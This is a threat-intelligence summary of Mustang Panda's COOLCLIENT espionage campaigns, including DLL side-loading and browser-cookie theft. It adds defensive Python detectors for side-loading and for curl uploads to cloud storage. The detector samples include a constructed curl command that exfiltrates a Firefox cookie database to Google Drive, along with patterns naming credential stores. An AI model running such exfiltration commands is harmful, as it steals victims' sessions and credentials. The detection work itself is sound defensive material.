Full Report
Threat actors with ties to China have been observed using an updated version of a backdoor called COOLCLIENT in cyber espionage attacks in 2025 to facilitate comprehensive data theft from infected endpoints. The activity has been attributed to Mustang Panda (aka Earth Preta, Fireant, HoneyMyte, Polaris, and Twill Typhoon) with the intrusions primarily directed against government entities located
Analysis Summary
# Threat Actor: Mustang Panda
## Attribution & Identity
* **Attribution:** Threat actors with ties to China.
* **Known Aliases:** Earth Preta, Fireant, HoneyMyte, Polaris, Twill Typhoon.
## Activity Summary
Mustang Panda was observed employing an updated version of the **COOLCLIENT** backdoor in cyber espionage attacks throughout 2025, with "comprehensive data theft" from compromised endpoints as the primary goal. Recent activity using this updated variant has targeted government entities in Myanmar, Mongolia, Malaysia, and Russia. COOLCLIENT is reportedly deployed as a secondary backdoor alongside PlugX and LuminousMoth infections.
## Tactics, Techniques & Procedures
* **Backdoor Deployment:** Used an updated version of the COOLCLIENT backdoor.
* **Delivery:** COOLCLIENT arrives with encrypted loader files that carry the configuration data, shellcode, and next-stage DLL modules; the modules are decrypted and loaded in memory.
* **Execution Method:** **DLL side-loading** is the primary execution method: a legitimate signed executable is placed beside a malicious DLL that it loads by name, so the payload runs under the signed vendor process.
* **DLL Side-Loading Abuse (2021-2025):** Abused legitimate signed binaries from Bitdefender ("qutppy.exe", renamed), VLC Media Player ("vlc.exe", renamed to "googleupdate.exe"), Ulead PhotoImpact ("olreg.exe"), and Sangfor ("sang.exe").
* **Persistence/Payload Dropping:** Campaigns in 2024/2025 that used the Sangfor side-loading vector delivered a COOLCLIENT variant which in turn dropped and executed a previously unseen **rootkit**.
* **Malware Chaining:** Deployed COOLCLIENT alongside other malware families such as PlugX and LuminousMoth, and used **TONESHELL** (TOnePipeShell) to establish persistence and drop additional payloads such as the **QReverse** RAT.
* **Data Collection/Exfiltration:** COOLCLIENT collects system and user information (including keystrokes and clipboard contents), files, and HTTP proxy credentials, and sends them to the C2 server over a TCP connection. It supports modular plugins for file management, service management, and remote shell access.
* **Browser Credential Theft:** Deployed three different stealer programs to extract saved login credentials from Chromium-based browsers (Chrome, Edge).
* **Exfiltration Method:** Observed running a cURL command to upload the Mozilla Firefox cookie database ("cookies.sqlite") to Google Drive.
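One way to hunt for the side-loading pattern described above in endpoint telemetry, as an added example that is not code from the article or from the actor's tooling: the Python below scores Sysmon-style image-load records using a simplified field set (the `ProcessSigned` and `ImageLoadedSigned` fields and every record in `SAMPLE_EVENTS` are constructed for this example). It flags a signed host binary whose on-disk name differs from its PE `OriginalFileName` (the vlc.exe-as-googleupdate.exe case), an unsigned DLL loaded from the host's own directory, execution from a user-writable path, and host names matching the binaries the summary lists.

```python
"""Score Sysmon-style image-load records for DLL side-loading.

Added example for this summary; not code from the article or the actor.
Field names are a simplified subset of Sysmon Event ID 7 (ImageLoad) plus the
host process's PE OriginalFileName; the records in SAMPLE_EVENTS are constructed.
"""
from __future__ import annotations

import ntpath

# Binary names the summary reports Mustang Panda abusing as side-loading hosts.
ABUSED_BINARIES = {"vlc.exe", "googleupdate.exe", "olreg.exe", "sang.exe", "qutppy.exe"}

# Paths an unprivileged user (and so a first-stage dropper) can normally write to.
WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")


def analyze_event(ev: dict) -> list[str]:
    """Return the reasons an image-load event looks like DLL side-loading (empty if none)."""
    image = ev["Image"].lower()            # host process on disk
    loaded = ev["ImageLoaded"].lower()     # module that was loaded
    name = ntpath.basename(image)
    loaded_name = ntpath.basename(loaded)
    reasons: list[str] = []

    # The pattern needs a signed host process loading a DLL; ignore everything else.
    if not loaded_name.endswith(".dll") or not ev.get("ProcessSigned", False):
        return reasons

    # 1. Renamed host: on-disk name differs from the PE header's OriginalFileName
    #    (vlc.exe shipped as googleupdate.exe, per the summary).
    original = ev.get("OriginalFileName", "").lower()
    if original and original != name:
        reasons.append(f"renamed binary: {name} has OriginalFileName {original}")

    # 2. Classic side-load: an unsigned DLL resolved from the host's own directory.
    if not ev.get("ImageLoadedSigned", False) and ntpath.dirname(loaded) == ntpath.dirname(image):
        reasons.append(f"unsigned {loaded_name} loaded from the executable's directory")

    # Only escalate when one of the primary indicators fired.
    if reasons:
        if image.startswith(WRITABLE_PREFIXES):
            reasons.append("host runs from a user-writable directory")
        if name in ABUSED_BINARIES or original in ABUSED_BINARIES:
            reasons.append(f"{name} matches a host binary the summary reports abused")
    return reasons


def detect_sideloading(events: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Return (host image, loaded module, reasons) for every suspicious event."""
    findings = []
    for ev in events:
        reasons = analyze_event(ev)
        if reasons:
            findings.append((ev["Image"], ev["ImageLoaded"], reasons))
    return findings


# Constructed records (not real telemetry) covering the cases the summary describes.
SAMPLE_EVENTS = [
    {   # renamed VLC under ProgramData pulling an unsigned DLL from beside itself
        "Image": r"C:\ProgramData\GoogleUpdate\googleupdate.exe", "OriginalFileName": "vlc.exe",
        "ProcessSigned": True, "ImageLoaded": r"C:\ProgramData\GoogleUpdate\libvlc.dll",
        "ImageLoadedSigned": False,
    },
    {   # a normal signed application loading its own signed component: benign
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "OriginalFileName": "firefox.exe",
        "ProcessSigned": True, "ImageLoaded": r"C:\Program Files\Mozilla Firefox\xul.dll",
        "ImageLoadedSigned": True,
    },
    {   # Sangfor binary in Temp loading a system DLL from System32: benign by itself
        "Image": r"C:\Users\a\AppData\Local\Temp\sang.exe", "OriginalFileName": "sang.exe",
        "ProcessSigned": True, "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
        "ImageLoadedSigned": True,
    },
    {   # same binary loading an unsigned DLL dropped next to it
        "Image": r"C:\Users\a\AppData\Local\Temp\sang.exe", "OriginalFileName": "sang.exe",
        "ProcessSigned": True, "ImageLoaded": r"C:\Users\a\AppData\Local\Temp\sfhelper.dll",
        "ImageLoadedSigned": False,
    },
]

if __name__ == "__main__":
    for host, module, reasons in detect_sideloading(SAMPLE_EVENTS):
        print(f"{host} -> {module}")
        for r in reasons:
            print(f"    {r}")
```

The renamed-binary check alone is the cheapest signal to deploy, because the PE `OriginalFileName` is recorded in Sysmon process-creation events and a vendor binary running under a different name has almost no legitimate explanation; the unsigned-DLL-from-own-directory check catches the cases where the attacker kept the original name.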
## Targeting
* **Sectors:** Government entities; multiple telecom operators in a long-running campaign that possibly began in 2021.
* **Geography:** Myanmar, Mongolia, Malaysia, Russia, and Thailand (where the browser stealers were detected).
* **Victims:** Government entities in the listed countries.
## Tools & Infrastructure
* **Malware Families Used:** COOLCLIENT (primary focus), PlugX, LuminousMoth, TONESHELL (TOnePipeShell), QReverse (RAT).
* **Infrastructure (C2):** Communication utilized TCP connections to a C2 server.
* **Exfiltration Targets:** Google Drive (used for Firefox cookie exfiltration).
## Implications
Mustang Panda continues to evolve its espionage toolkit, updating core components such as COOLCLIENT and relying on DLL side-loading through legitimate signed vendor binaries to blend execution in with trusted software. The deployment of a rootkit alongside COOLCLIENT shows an intent to maintain deep, sustained access within targeted networks for comprehensive data theft and long-term espionage, particularly against government networks.
## Mitigations
(The article does not list specific remediation steps; the mitigations below are inferred from the TTPs.)
* Monitor for DLL side-loading, especially signed third-party vendor executables (e.g., VLC, Sangfor) running from unusual or user-writable paths, running under a name that differs from their PE OriginalFileName, or loading an unsigned DLL from their own directory.
* Enforce application control or integrity rules so that signed vendor binaries only run from, and load DLLs from, their installed location, and alert on unexpected DLL loads by those binaries.
* Watch for command-line tools such as cURL uploading files to cloud storage services (e.g., Google Drive) shortly after backdoor activity, particularly when the uploaded file is a browser cookie or credential store such as cookies.sqlite.
* Hunt for secondary-stage payloads such as rootkits, for example unexpected driver or service installation following COOLCLIENT activity.
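The cURL-to-Google-Drive exfiltration noted under the TTPs and in the mitigations above can be triaged from process command lines. The Python below is an added example, not code from the article: it parses a curl command line for uploaded local files and destination URLs, then raises severity when the file is a browser cookie or credential store and the destination is Google Drive. The command lines in `SAMPLE_CMDLINES` are constructed; the Google Drive upload URL pattern and the Chromium store names are assumptions (the summary only says that cookies.sqlite was sent to Google Drive).

```python
"""Triage curl command lines for browser-artifact upload to cloud storage.

Added example for this summary, not code from the article. The sample command
lines are constructed; the Google Drive upload URL pattern is an assumption
(the summary only says the cookie file went to Google Drive).
"""
import ntpath
import re
import shlex

# curl options whose following token is an argument we do not inspect.
SKIP_WITH_ARG = {"-X", "--request", "-H", "--header", "-o", "--output", "-A", "--user-agent", "-u", "--user"}
# Options that upload a local file: -T/--upload-file always, the rest only with an @path.
UPLOAD_ALWAYS = {"-T", "--upload-file"}
UPLOAD_IF_AT = {"-F", "--form", "-d", "--data", "--data-binary"}

# cookies.sqlite is from the summary; the other names are assumed Firefox/Chromium stores.
BROWSER_ARTIFACTS = re.compile(r"(cookies\.sqlite|logins\.json|key4\.db|\\login data|\\cookies)\b", re.I)
# Assumed Google Drive upload endpoints for the exfiltration target the summary names.
DRIVE_DESTINATIONS = re.compile(r"https?://(www\.)?(googleapis\.com/upload/drive|drive\.google\.com)", re.I)


def parse_curl(cmdline: str):
    """Return (uploaded local files, URLs) from a curl command line; both empty if not curl."""
    try:
        raw = shlex.split(cmdline, posix=False)   # non-POSIX keeps Windows backslashes intact
    except ValueError:                            # unbalanced quotes in real telemetry happen
        raw = cmdline.split()
    toks = [t.strip('"') for t in raw]
    if not toks or ntpath.basename(toks[0]).lower() not in ("curl", "curl.exe"):
        return [], []
    files, urls = [], []
    i = 1
    while i < len(toks):
        t = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if t in SKIP_WITH_ARG:
            i += 2
        elif t in UPLOAD_ALWAYS and nxt:
            files.append(nxt)
            i += 2
        elif t in UPLOAD_IF_AT and nxt:
            m = re.search(r"@(.+)$", nxt)         # -F file=@path or --data-binary @path
            if m:
                files.append(m.group(1))
            i += 2
        else:
            if t.lower().startswith(("http://", "https://")):
                urls.append(t)
            i += 1
    return files, urls


def classify(cmdline: str) -> dict:
    """Score one process command line; severity is none/low/medium/high."""
    files, urls = parse_curl(cmdline)
    reasons = []
    if files:
        reasons.append("curl upload of a local file")
    if any(BROWSER_ARTIFACTS.search(f) for f in files):
        reasons.append("uploaded file is a browser cookie or credential store")
    if files and any(DRIVE_DESTINATIONS.search(u) for u in urls):
        reasons.append("destination is Google Drive")
    severity = {0: "none", 1: "low", 2: "medium", 3: "high"}[len(reasons)]
    return {"severity": severity, "files": files, "urls": urls, "reasons": reasons}


# Constructed command lines (not real telemetry); the bearer token is a placeholder.
SAMPLE_CMDLINES = [
    r'curl.exe -X POST -H "Authorization: Bearer REDACTED" -F "file=@C:\Users\a\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2.default\cookies.sqlite" https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart',
    r"curl.exe -o C:\Temp\update.zip https://example.com/update.zip",
    r'curl.exe -T "C:\build\report.pdf" https://www.googleapis.com/upload/drive/v3/files?uploadType=media',
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        v = classify(c)
        print(v["severity"], "|", "; ".join(v["reasons"]) or "-", "|", c[:60])
```

Treating the upload flag, the file type and the destination as three separate signals keeps plain downloads at "none" and ordinary Drive uploads at "medium", so only the combination the summary describes (a browser store pushed to Google Drive) reaches "high"; the `files` and `urls` fields in the result give the analyst the artifact and destination to pivot on.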